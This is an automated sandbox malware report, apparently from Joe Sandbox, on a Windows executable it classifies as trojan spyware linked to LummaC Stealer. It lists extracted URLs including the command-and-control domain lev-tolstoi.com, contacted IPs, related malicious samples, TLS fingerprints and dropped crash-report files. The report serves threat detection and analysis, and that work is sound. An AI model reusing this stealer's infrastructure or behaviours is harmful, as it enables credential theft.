https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&	1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	false		high
https://help.steampowered.com/en/	1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/market/	1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/news/	1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	1fxm3u0d.exe, 00000003.00000003.2193618825.0000000005A8A000.00000004.00000800.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2193777307.0000000005A87000.00000004.00000800.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2193683673.0000000005A87000.00000004.00000800.00020000.00000000.sdmp	false		high
http://store.steampowered.com/subscriber_agreement/	1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org	1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/discussions/	1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	false		high
https://lev-tolstoi.com/apimalISo	1fxm3u0d.exe, 00000003.00000002.2386928574.0000000003417000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://store.steampowered.com/stats/	1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am	1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png	1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a	1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/steam_refunds/	1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	false		high
http://x1.c.lencr.org/0	1fxm3u0d.exe, 00000003.00000003.2258291681.0000000005A6F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	1fxm3u0d.exe, 00000003.00000003.2258291681.0000000005A6F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	1fxm3u0d.exe, 00000003.00000003.2193618825.0000000005A8A000.00000004.00000800.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2193777307.0000000005A87000.00000004.00000800.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2193683673.0000000005A87000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a	1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900	1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016	1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e	1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=kOc26QwM0vlX&l=e	1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/workshop/	1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.mozilla.org/products/firefoxgro.all	1fxm3u0d.exe, 00000003.00000003.2259261671.0000000005D78000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c	1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/legal/	1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	false		high
https://lev-tolstoi.com/api30Qy	1fxm3u0d.exe, 00000003.00000003.2258095932.0000000005AE7000.00000004.00000800.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2257813367.0000000005AE6000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en	1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng	1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	false		high
https://lev-tolstoi.com/apidE	1fxm3u0d.exe, 00000003.00000003.2370076676.0000000003405000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2308206349.0000000003405000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2320693548.0000000003405000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	1fxm3u0d.exe, 00000003.00000003.2193618825.0000000005A8A000.00000004.00000800.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2193777307.0000000005A87000.00000004.00000800.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2193683673.0000000005A87000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a	1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl	1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	false		high
http://upx.sf.net	Amcache.hve.6.dr	false		high
https://lev-tolstoi.com/api0	1fxm3u0d.exe, 00000003.00000003.2280589839.000000000339C000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2381261813.00000000033A4000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2308206349.000000000339C000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2370076676.00000000033A4000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000002.2386763514.00000000033A5000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2320693548.000000000339C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://store.steampowered.com/	1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png	1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	false		high
https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg	1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	false		high
https://lev-tolstoi.com/A	1fxm3u0d.exe, 00000003.00000003.2381436216.0000000003405000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000002.2386904956.0000000003405000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif	1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	1fxm3u0d.exe, 00000003.00000003.2193618825.0000000005A8A000.00000004.00000800.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2193777307.0000000005A87000.00000004.00000800.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2193683673.0000000005A87000.00000004.00000800.00020000.00000000.sdmp	false		high
https://lev-tolstoi.com:443/api	1fxm3u0d.exe, 00000003.00000003.2370076676.00000000033A4000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2320693548.000000000339C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ	1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crt.rootca1.amazontrust.com/rootca1.cer0?	1fxm3u0d.exe, 00000003.00000003.2258291681.0000000005A6F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://lev-tolstoi.com/apic	1fxm3u0d.exe, 00000003.00000003.2166952473.00000000033CB000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165300750.00000000033CB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp	1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	false		high
http://store.steampowered.com/account/cookiepreferences/	1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/mobile	1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/	1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.66.86	lev-tolstoi.com	United States		13335	CLOUDFLARENETUS	true
23.55.153.106	steamcommunity.com	United States		20940	AKAMAI-ASN1EU	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1577311
Start date and time:	2024-12-18 11:32:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 56s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	1fxm3u0d.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@5/6@11/2
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 100% Number of executed functions: 20 Number of non-executed functions: 105
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.189.173.22, 20.190.177.23, 172.202.163.200, 13.107.246.63
Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target 1fxm3u0d.exe, PID 6596 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
05:32:57	API Interceptor	14x Sleep call for process: 1fxm3u0d.exe modified
05:33:33	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.66.86	MV ROCKET_PDA.exe	Get hash	malicious	FormBook	Browse	www.ayushigangwar.com/nqn4/?CJBlp=0Brh6Vr8UbBX&T2MpwT=59bmqUDXor7TXV4b71NCQ0d0nCVif23i1yH5+9ZmJc5hgCU7y+ZN9z0btTsWzGv6OrGw
23.55.153.106	2kudv4ea.exe	Get hash	malicious	LummaC	Browse
	ardware-v1.exe	Get hash	malicious	LummaC	Browse
	ardware-v1.exe	Get hash	malicious	LummaC	Browse
	sNWQ2gC6if.exe	Get hash	malicious	LummaC	Browse
	66DJ2wErLz.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Xmrig	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse
	wN8pQhRNnu.exe	Get hash	malicious	LummaC	Browse
	AZCFTWko2q.exe	Get hash	malicious	LummaC	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
lev-tolstoi.com	2kudv4ea.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	ardware-v1.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	ardware-v1.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
steamcommunity.com	2kudv4ea.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	ardware-v1.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	ardware-v1.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	sNWQ2gC6if.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	66DJ2wErLz.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	file.exe	Get hash	malicious	Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, Stealc, Xmrig	Browse	104.102.49.254
	hpEAJnNwCB.exe	Get hash	malicious	LummaC	Browse	104.121.10.34
	DG55Gu1yGM.exe	Get hash	malicious	LummaC	Browse	104.121.10.34
	he55PbvM2G.exe	Get hash	malicious	LummaC	Browse	104.121.10.34
	SkaKk8Z1J0.exe	Get hash	malicious	LummaC	Browse	104.121.10.34

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AKAMAI-ASN1EU	2kudv4ea.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	EXTERNALRe.msg	Get hash	malicious	Unknown	Browse	23.44.201.32
	ardware-v1.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	YF3YnL4ksc.exe	Get hash	malicious	Unknown	Browse	23.218.93.195
	ardware-v1.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	mipsel.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	23.43.121.120
	https://adobe.blob.core.windows.net/adobe/adobe.html?sp=r&st=2024-12-17T20:58:07Z&se=2025-01-11T04:58:07Z&spr=https&sv=2022-11-02&sr=b&sig=vDeHaevGyq9deO2tRq9D03JLZreACGon6EF%2FhhJQk7s%3D	Get hash	malicious	Unknown	Browse	104.116.245.16
	https://walli.shanga.co/image/view/?id=1375	Get hash	malicious	Unknown	Browse	172.232.25.148
	jew.mips.elf	Get hash	malicious	Unknown	Browse	172.235.101.204
	https://garfieldthecat.tech/Receipt.html	Get hash	malicious	WinSearchAbuse	Browse	23.195.39.65
CLOUDFLARENETUS	2kudv4ea.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	http://trackmail.info/QLTRG66TP4/offer/00248/811/iuk7x/b4q/41/32	Get hash	malicious	Unknown	Browse	104.21.52.161
	Memo - Impairment Test 2023 MEX010B (5).js	Get hash	malicious	Unknown	Browse	104.21.10.224
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, RHADAMANTHYS, Xmrig	Browse	104.21.23.76
	urS3jQ9qb5.jar	Get hash	malicious	Can Stealer	Browse	172.67.191.110
	NativeApp_G5L1NHZZ.exe	Get hash	malicious	LummaC Stealer	Browse	172.64.41.3
	hzD92yQcTT.exe	Get hash	malicious	LummaC	Browse	172.67.197.170
	Awb 4586109146.bat.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	104.26.13.205
	PO 0309494059506060609696007.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	104.26.12.205
	urS3jQ9qb5.jar	Get hash	malicious	Can Stealer	Browse	172.64.41.3

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	2kudv4ea.exe	Get hash	malicious	LummaC	Browse	104.21.66.86 23.55.153.106
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, RHADAMANTHYS, Xmrig	Browse	104.21.66.86 23.55.153.106
	NativeApp_G5L1NHZZ.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.66.86 23.55.153.106
	hzD92yQcTT.exe	Get hash	malicious	LummaC	Browse	104.21.66.86 23.55.153.106
	JnEZtj3vtN.exe	Get hash	malicious	PureCrypter	Browse	104.21.66.86 23.55.153.106
	ardware-v1.exe	Get hash	malicious	LummaC	Browse	104.21.66.86 23.55.153.106
	YF3YnL4ksc.exe	Get hash	malicious	Unknown	Browse	104.21.66.86 23.55.153.106
	ardware-v1.exe	Get hash	malicious	LummaC	Browse	104.21.66.86 23.55.153.106
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, RHADAMANTHYS, Xmrig	Browse	104.21.66.86 23.55.153.106
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, RHADAMANTHYS, Xmrig	Browse	104.21.66.86 23.55.153.106

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_1fxm3u0d.exe_f4186c4b8eab2dd952d8302a6ce3ee254f527f_b5ec2080_cfe06b34-4b56-4095-b0a6-b528daed48c7\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.7039938030067752
Encrypted:	false
SSDEEP:	96:HngFUEpK3sVhVoI7Rh6tQXIDcQvc6QcEVcw3cE/n+HbHg/8BRTf3Oy1FhZAX/d5j:HguH3E0BU/gju1zuiFpZ24IO8+
MD5:	E266B8BAC0267FD705C33DCCA4EB8404
SHA1:	EBDDB0119DA5F9E5D3032AE466BE716DE4CF4D51
SHA-256:	37043E4D50DF3F82FAF34038AEC4E965AFA064F06FFC723463CDCE9558C9B533
SHA-512:	1B2B2CEEB1BC0904DA1EB9479433426B73C3807E4CAA06ED9982239A31E88C0EB27EA50784F5D9F29F5B21FC9D2E8D765EC348FC387BB2DEF524077F753FD28A
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.9.9.1.5.7.7.9.5.6.5.0.9.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.8.9.9.1.5.7.8.2.5.3.3.8.7.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.f.e.0.6.b.3.4.-.4.b.5.6.-.4.0.9.5.-.b.0.a.6.-.b.5.2.8.d.a.e.d.4.8.c.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.3.f.d.b.c.1.4.-.7.d.b.6.-.4.f.e.2.-.b.5.3.0.-.b.8.9.e.8.8.b.5.5.a.9.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.1.f.x.m.3.u.0.d...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.1.1.0.-.0.0.0.1.-.0.0.1.4.-.8.e.e.b.-.f.8.3.2.3.8.5.1.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.0.e.5.e.5.8.e.8.1.1.2.2.d.7.7.7.1.7.b.8.d.d.4.e.6.5.f.5.2.8.8.0.0.0.0.f.f.f.f.!.0.0.0.0.e.0.6.6.4.6.a.5.5.9.c.d.4.7.d.1.6.9.9.2.6.e.d.5.1.5.6.4.4.d.4.c.a.7.8.f.e.e.c.2.!.1.f.x.m.3.u.0.d...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4./.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5D77.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Wed Dec 18 10:32:58 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	36488
Entropy (8bit):	1.728046993519489
Encrypted:	false
SSDEEP:	96:5y86xthF7VlBOWAIb1uPAi73tJA2Cfa2vEqqwpHfXH1FjVtm9WIkWIXpyPUSbXno:DkPjY4O0faHwpPVFjaKycgdxlGtD
MD5:	12BAA5BD292789373C90EB13EA5FE6B0
SHA1:	35572BCB72F70991FAE0D4F19275920BC5FD7C03
SHA-256:	4231C96D251833CE874944CE87E88323F2AE9CA93073A537A3E0931AF3065332
SHA-512:	C06F3AED42ADE8B97EF0ECBB10C05F47FFE5C17100E95DE800457DA45FDBA20BF47ACF8F357362BDC16FBD8C5EF8A7E591B4C79DC4F83C49405411CAD63B112E
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... ........bg........................X...............V...........T.......8...........T.......................................................................................................................eJ......x.......GenuineIntel............T............bg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5DC6.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8398
Entropy (8bit):	3.695799866533208
Encrypted:	false
SSDEEP:	192:R6l7wVeJYA6N6YEIzSU9h5gmfuLprZ89bRIsfx7m:R6lXJf6N6YE8SU9h5gmfuQR7fQ
MD5:	34D98837F40FF2601F5E7804747D4EDF
SHA1:	751C2D0BE1F744E57E1FE00637B4DE3295E8694D
SHA-256:	E5F1D088EF74A8CB25E5B2E3D1F9C0582490D9B78C1B7328E1454E087AF299D5
SHA-512:	D0B7A059F043416866FE2940B90D17904D5F7B8ABACE2119E082700492114E8B333D29780BB7E90AE8FCF4557DD705888CEA0726F483F06624C44305959E56F9
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.3.6.8.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5E16.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4710
Entropy (8bit):	4.472200421843337
Encrypted:	false
SSDEEP:	48:cvIwWl8zsAJg77aI9LIWpW8VYJvYm8M4J+NJF6+q8vjNVB+oY7PtTd:uIjfGI7th7V6yJ+8KjPBoPtTd
MD5:	F2AAAEC6A713FC3B9CD640B34C97BAE0
